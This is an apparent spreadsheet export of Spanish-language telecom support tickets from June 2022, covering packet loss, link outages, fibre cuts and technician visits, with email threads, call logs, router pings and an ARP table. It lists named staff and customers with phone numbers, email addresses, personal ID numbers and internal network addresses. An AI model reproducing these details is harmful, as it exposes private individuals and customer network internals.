ASUNTO: RE: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: 802800002 / SD1134175 /802800001 / SD1134176 // PROBLEM: PÉRDIDA DE PAQUETES //
ABRAHAM.
                CONTINUAMOS A LA ESPERA DE SUS COMENTARIOS SOBRE EL MAIL QUE ANTECEDE, PODRÍA INDICARNOS SI PODEMOS PROCEDER AL CIERRE DE LOS TICKET.
ATENTAMENTE:
DE: GERSON NICOLAS AJPACAJA PONCIO
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 10:20
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: 802800002 / SD1134175 /802800001 / SD1134176 // PROBLEM: PÉRDIDA DE PAQUETES //
BUEN DÍA ESTIMADOS
DANDO SEGUIMIENTO AL CASO, SE INFORMA QUE NO SE REALIZO ALGUNA ACCIÓN, SOLO SE VALIDO EL CORREDOR QUE LAS NEGOCIACIONES ESTÉN ENGANCHANDO BIEN.
POSIBLE SATURACIÓN EN LA RED, PERO NO SE LOGRÓ VER DEBIDO QUE NO SE LE TIENE GESTIÓN DE EQUIPO.
ATENTO A SUS COMENTARIOS.
SALUDOS CORDIALES
________________________________________
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 10:08
PARA: DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: 802800002 / SD1134175 /802800001 / SD1134176 // PROBLEM: PÉRDIDA DE PAQUETES //
BUENAS,
YA VEMOS AMBOS SIN PERDIDAS, PUEDEN INDICAR QUE ACCIONES HAN TOMADO Y SI ES PERMANENTE? TENER EN CUENTA QUE LAS PÉRDIDAS FUERON BASTANTE NOTABLES.
GRAPTYSL2&gt; PING ROUTING-INSTANCE VPN_12956_15900 10.192.1.206 COUNT 100 RAPID SIZE 100
PING 10.192.1.206 (10.192.1.206): 100 DATA BYTES
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
--- 10.192.1.206 PING STATISTICS ---
100 PACKETS TRANSMITTED, 100 PACKETS RECEIVED, 0% PACKET LOSS
ROUND-TRIP MIN/AVG/MAX/STDDEV = 123.019/123.513/125.163/0.513 MS
GRAPTYSL2&gt; PING ROUTING-INSTANCE VPN_12956_15900 10.192.1.210 COUNT 100 RAPID SIZE 100
PING 10.192.1.210 (10.192.1.210): 100 DATA BYTES
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
--- 10.192.1.210 PING STATISTICS ---
100 PACKETS TRANSMITTED, 100 PACKETS RECEIVED, 0% PACKET LOSS
ROUND-TRIP MIN/AVG/MAX/STDDEV = 119.880/120.326/125.510/0.691 MS
SALUDOS
ABRAHAM NAKFOUR
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA | SHIFT LEADER
TELEFÓNICA GLOBAL SOLUTIONS | EXTERNAL CONSULTANT
FIX PHONE +34 917 697 640
EMAIL SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM
...</t>
  </si>
  <si>
    <t>F4597930</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA EL SEÑOR ANTONI QUIEN INDICA QUE AUN NO LE DA RESPUESTA CLIENTE FINAL QUE SE TENGA EN OBSERVACION 2 HRS SI NO RESPONDE QUE SE PUEDE PROCEDER AL CIERRE DEL TICKET **
ID 2001895147
**</t>
  </si>
  <si>
    <t>***
SE CONVERSA CON KARINA BONILLA, BRINDA OTRO PERSONAL. SE ENVÍAN DATOS A CLIENTE DE AMBOS TÉCNICOS. CLIENTE EN UN CORREO ANTERIOR HABÍA CONFIRMADO VISITA EL DÍA DE HOY A LAS 14H.
SE VALIDA ACCESO CON EL CLIENTE PARA HOY A LAS 14:00 HRS LT.
CONTACTO EN SITIO: JOSIE ESTEBAN: +506 6057 3819
***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 8:23
PARA: HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC ::: IMCRL004792 ::: LINK DOWN
ESTIMADOS BUEN DÍA,
ESTIMADOS, SE ESTARÁ HACIENDO PRESENTE EL PERSONAL TÉCNICO EL DÍA DE HOY A LAS 14H. A SU VEZ FAVOR DE APOYARNOS CON GENERAR ACCESOS TAMBIÉN PARA JOSÉ LONGA, ELLO PARA PODER TENER OTRO PERSONAL DISPONIBLE POR CUALQUIER EVENTUALIDAD.
JOSE MELENDEZ LONGA ID 186200035703
JEFFRY ROSALES VILLAREAL ID 503550015
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.
DE: HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 8:14
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC ::: IMCRL004792 ::: LINK DOWN
ESTIMADOS, BUEN DÍA
SE VALIDA ACCESO CON EL CLIENTE PARA HOY A LAS 14:00 HRS LT.
CONTACTO EN SITIO: JOSIE ESTEBAN: +506 6057 3819
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>*** SE CONVERSA CON OSWALDO DE TELMEX, COMENTA QUE ESTARÁ CONTACTANDO CON CLIENTE PARA CONFIRMAR ACCESOS Y HORARIO ***
2001562785
COLA:
NOMBRE: A: 00525551745299
NÚMERO: 00525551745299
DURACIÓN: 0:02:55
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 00525551745299
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ANGEL.TORRES
FECHA Y HORA LOCALES: 11/06/2022 07:54:29</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 11 DE JUNIO DE 2022 7:49
PARA: HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC ::: IMCRL004792 ::: LINK DOWN
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN. ASIMISMO BRINDAR FECHA Y HORARIO PARA LA VISITA:
JEFFRY ROSALES VILLAREAL ID 503550015
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIAA CORREO A CLEINTE SOLICITANDO VISITA  LUNES 13/06/2022 A LAS 10:00
RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC ::: IMCRL004792 ::: LINK DOWN
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:ANGEL DANIEL TORRES AJTUNY 5 MÁS
CC:'CNOC INTERNACIONAL' &lt;CNOC.INTL@UNINET.COM.MX&gt;Y 5 MÁS
SÁB 11/06/2022 18:17
BUENA DÍA  ESTIMADOS  ,
SOLICITANDO DE SU VALIOSOS APOYO , PARA BRINDAR ACCESOS A NUESTRA ÁREA TÉCNICA, VISITA PROGRAMADA A EL DÍA LUNES 13/06/2022 A LAS 10:00AM
TÉCNICOS
JOSE MELENDEZ LONGA ID 186200035703
JEFFRY ROSALES VILLAREAL ID 503550015
AGRADECEMOS  CONFIRMAR POR ESTA VIA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  52 55 5174 5299 GERARDO MENCIONA QUE AUN NO CUENTAN CON RESPUESTA POR PARTE DE CLIENTE FINAL
-ID 2001934040</t>
  </si>
  <si>
    <t>F4598006</t>
  </si>
  <si>
    <t>NO SE TIENE RESPUESTA POR PARTE DE CLIENTE, SERVICIO A NIVEL DE CLARO OPERATIVO.  NO SE OBSERVARON EVENTOS QUE CAUSARAN CAIDA DEL SERVICIO. SE SOLICITA
AFECTACION: 	RENDIMIENTO
CAUSA RAIZ: 	LAN
QUE SE REALIZO PARA SOILUCIONARLO: N/A
QUE SUCEDIO: CLIENTE REPORTA CAIDA TOTAL.
PORQUE SUCEDIO: PROBLEMAS LAN</t>
  </si>
  <si>
    <t>F4598077</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOEL LOPEZ 55090977  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001862543</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOEL LOPEZ AL 55090977 INDICA QUE YA ESTA EN SITIO PARA REALIZAR LAS PRUEBAS || SE NOTIFICA A GESTOR **
-ID 2001787055
**</t>
  </si>
  <si>
    <t>F4598079</t>
  </si>
  <si>
    <t>SE LLAMA A TECNICO SIN TENER RESPUETA</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                               TABLA DE ESCALACION DESPACHOS SV 				
	WO OPEN                                			7:52
1/5	RICARDO DE PAZ	78432633	2 HORAS	9:52:00
2/5	HUMBERTO CHIQUILLO	78523419	3 HORAS	10:52:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	11:52:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	13:52:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	15:52:00</t>
  </si>
  <si>
    <t>2001859136
COLA:
NOMBRE: A: 50378404547
NÚMERO: 50378404547
DURACIÓN: 0:00:26
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: 50378404547
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 13/06/2022 11:26:04</t>
  </si>
  <si>
    <t>SIN RESPUESTA CIC NO SACA LLAMADA AL SALVADOR</t>
  </si>
  <si>
    <t>TECNICOS EN RADIO BASE DETERMINAN QUE SE DAÑO LA BSDU, SE LLAMARA EN 30 MINUTOS PARA ACTUALIZAR AVANCES.
RESULTADO: LLAMADA HECHA
NOMBRE: 50378432630
NÚMERO: 50378432630
INICIO: HOY, 07:44
FIN: HOY, 07:45
DURACIÓN: 1:10
ID DE LLAMADA: 2001785913</t>
  </si>
  <si>
    <t>SE TRASLADA A PLEX
	WO OPEN                                			7:52
1/5	ALICIA TOBAR	78404534	2 HORAS	9:52:00
2/5	ADRIAN GUEVARA	78554469	3 HORAS	10:52:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	11:52:00
4/5	OSCAR HERNANDEZ 	7855-0164	5 HORAS	12:52:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	14:52:00</t>
  </si>
  <si>
    <t>ZELEDON INDICA QUE SE TIENE CORTE DE FIBRA A 190 METROS DE CLIENTE EN PROCESO DE REPARACION</t>
  </si>
  <si>
    <t>REALIZAN CAMBIOS DE EQUIPO DAÑADO EN NODO,, SE TRASLADARAN  A CLIENTE PARA CONFIGURAR ANTENA SE LLAMARA NUEVAMENTE A LAS 9:25
2001796838
COLA:
NOMBRE: A: 50378432630
NÚMERO: 50378432630
DURACIÓN: 0:01:24
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50378432630
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 13/06/2022 08:38:05</t>
  </si>
  <si>
    <t>F4598100</t>
  </si>
  <si>
    <t>SERVICIO YA SE ENCUENTRA OPERATIVO Y ESTABLE PERO NO SE OBSERVA EQUIPOS ASOCIADOS A LAN DE CLIENTE, SE LLAMA A  87844342 /ENCARGADO PERO NO SE TIENE RESPUESTA A LLAMADAS, TAMPOCO HAY RESPUESTA CON ERICK CANALES  88675716
2001731219
COLA:
NOMBRE: A: 50587844342
NÚMERO: 50587844342
DURACIÓN: 0:00:35
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50587844342
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 12/06/2022 12:33:10
2001731417
COLA:
NOMBRE: A: 50588675716
NÚMERO: 50588675716
DURACIÓN: 0:00:37
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50588675716
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 12/06/2022 12:34:44
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/0                                                INTERFACE
CELL0/0/1                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/1                                                INTERFACE
ETH0/0/0                      DOWN    DOWN     HUAWEI, AR SERIES, ETHERNET0/0/0                                                INTERFACE
GE0/0/0                       DOWN    DOWN     LAN DEL CLIENTE
GE0/0/1                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE                                               T0/0/1 INTERFACE
GE0/0/2                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE                                               T0/0/2 INTERFACE
GE0/0/3                       UP      UP       WAN REDUNDANTE/_/5338437ON/_/
GE0/0/4                       UP      UP       WAN PRINCIPAL/_/5338435ON/_/
GE0/0/5                       UP      DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
LOOP6                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       DOWN    DOWN     LAN_CLIENTE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               1 INTERFACE
&lt;BAC_BONANZA&gt;DIS ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
172.18.142.70   340A-98F4-1763            I -         GE0/0/0
10.40.52.86     340A-98F4-1763            I -         GE0/0/3
10.40.52.85     F41D-6BA3-8E28  19        D-0         GE0/0/3
10.40.52.82     340A-98F4-1764            I -         GE0/0/4
10.40.52.81     F41D-6BA3-8E28  10        D-0         GE0/0/4
------------------------------------------------------------------------------
TOTAL:5         DYNAMIC:2       STATIC:0     INTERFACE:3
&lt;BAC_BONANZA&gt;</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE ERICK CANALES  88675716 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001827298</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICK CANALES  88675716 MENCIONA QUE ESTARAN REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA A LAS 10:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 2001787510</t>
  </si>
  <si>
    <t>F4598109</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE INDICÁNDOLE QUE ENLACE FUE AFECTADO POR CORTE DE FO EN SECTOR POR TRABAJOS DE AMPLIACIÓN DE CARRETERA; SE LE PIDE CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4598112</t>
  </si>
  <si>
    <t>##CLIENTE BRENDA FLORES  INDICA SERVICIO OPERATIVO EN LLAMADA CON TECNICO  Y SE PROCEDE A CIERRE DE TICKET ##
3001069929
COLA:
NOMBRE: A: 58263125
NÚMERO: 58263125
DURACIÓN: 0:07:16
ESTADO: CONECTADA
DETALLES: 58263125
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 14/06/2022 10:40:30</t>
  </si>
  <si>
    <t>F4598119</t>
  </si>
  <si>
    <t>CRONOS ANTERIORES INDICAN VISITA PROGRAMADA PARA HOY A LAS 19:00 HORAS.</t>
  </si>
  <si>
    <t>CLIENTE DIEGO INDICA QUE CONFIRMARÁ LOS PERMISOS PARA LA VISITA DE MAÑANA 15/06 EN CUANTO LLEGUE A LA OFICINA
3001067597
COLA:
NOMBRE: A: 55574872
NÚMERO: 55574872
DURACIÓN: 0:00:41
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55574872
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 10:28:30</t>
  </si>
  <si>
    <t>DIEGO HERRERA/CLIENTE 55574872 PIDE SE COORDINE LA VISITA TÉCNICA PARA EL DÍA MIÉRCOLES 15  A LAS 19:00 HORAS, PIDE SE ENVÍE CORREO PARA TRAMITAR PERMISOS; SE INFORMA DE LO ANTERIOR A GESTIÓN AE VÍA SKYPE:
DHERRERA@ARISASEGUROS.COM
GFERNANDEZ@ARISASEGUROS.COM
JTORRES@ARISASEGUROS.COM</t>
  </si>
  <si>
    <t>CLIENTE DIEGO HERRERA AL 55574872 SOLICITA SE LE LLAME A LAS 15 HORAS PARA CONFIRMAR VISITA PARA EL DIA DE MAÑANA 14/06
2001842933
COLA:
NOMBRE: A: 55574872
NÚMERO: 55574872
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 55574872
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 13/06/2022 10:42:09</t>
  </si>
  <si>
    <t>CRONOS ANTERIORES INDICAN COORDINADA LA VISITA TÉCNICA A PR MAÑANA A LAS 19:00 HORAS, HAY CORREO SEGUIMIENTO:
ASUNTO: RE: CASO: SD1134046 /// ARISA CORREDORES DE SEGUROS//E1: 24990900 Y 24991000</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DIEGO HERRERA QUIEN INDICA QUE YA VA ABRIRLES A LOS TECNICOS.
3001457925
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4895
DURACIÓN: 0:00:05
ESTADO: CONECTADA
DETALLES: 4895
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 19:12:13</t>
  </si>
  <si>
    <t>F4598140</t>
  </si>
  <si>
    <t>CLIENTE LISETH 32580415 COMENTA QUE NO GENERA NI RECIBE LLAMADAS, SE LE INDICA QUE A NIVEL DE CLARO SE OBSERVA OPERATIVO. SE LE SOLICITA AL CLIENTE UBICAR Y REINICIAR SU PBX. ID: 2001601067</t>
  </si>
  <si>
    <t>LUEGO DEL REINICIO DE LA PBX GRANDSTREAM CLIENTE CONTINUA SIN SACAR NI RECIBIR LLAMADAS, CLIENTE INDICA QUE ESCALARÁ CON EL PROVEEDOR DE SU PBX YA QUE TAMPOCO TIENE LLAMADAS INTERNAS. CLIENTE AUTORIZA EL CIERRE DEL CASO. A NIVEL DE CLARO E1 SIN AFECTACIÓN.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050432580415
NÚMERO: 0050432580415
INICIO: HOY, 10:53 A. M.
FIN: HOY, 11:02 A. M.
DURACIÓN: 8:41
ID DE LLAMADA: 2001601067</t>
  </si>
  <si>
    <t>F4598148</t>
  </si>
  <si>
    <t>SE CONTACTA CONTACTA CON EL PR CESAR AL 32865466 ID  2001611440 DONDE CONFIRMA QUE NO TIENE AUN INTERNET, SE PROCEDE A TRANSFERIR AL 8126 CON EL GESTOR A CARGO JOSE.OCHOA ID 2001611635 SE LE BRINDA LA INFORMACIÓN Y SE DEJA CON EL PR EN LINEA.</t>
  </si>
  <si>
    <t>F4598179</t>
  </si>
  <si>
    <t>CLIENTE LORENA REYNOSO 56956594 VALIDA EL E1 OPERATIVO, SOLICITA SE TENGA EN OBSERVACIÓN Y VALIDAR A LAS 4 PM
ID: 2001615401</t>
  </si>
  <si>
    <t>F4598193</t>
  </si>
  <si>
    <t>F4598253</t>
  </si>
  <si>
    <t>SE HABLÓ CON JEFFERSON ARCE/CLIENTE 22437253 INDICA QUE AÚN SIGUEN REALIZANDO SUS PRUEBAS INTERNAS, PIDE SE LE LLAME A LAS 17:00 HORAS PARA SEGUIMIENTO:
ASUNTO: RE: ENLACE INESTABLE DE DA-CR- PLANTA GAR (GRANJA AVICOLA RICURA) ID: CONTR0001675129OC</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE,  SOLICITANDO PRUEBAS, NO SE OBSERVAN PROBLEMAS A NIVEL DE CLARO.
JURGEN RENE BOCH CAAL
BUEN DÍA,
ESTIMADO CLIENTE, PODRÍA PROPORCIONARNOS INFORMACIÓN HACIA QUE DIRECCIONES IP OBSERVA LAS PÉRDIDAS DE PAQUETES, DIRECCIÓN DE ORIGEN Y DESTINO, POR FAVOR.
SALUDOS.
&lt;HHERCRMPN1W1N01O01EIM1&gt;PING -C 3000 -S 1500 -M 30 -B -VPN-INSTANCE DATOS_WALMART 10.201.12.131
  PING 10.201.12.131: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!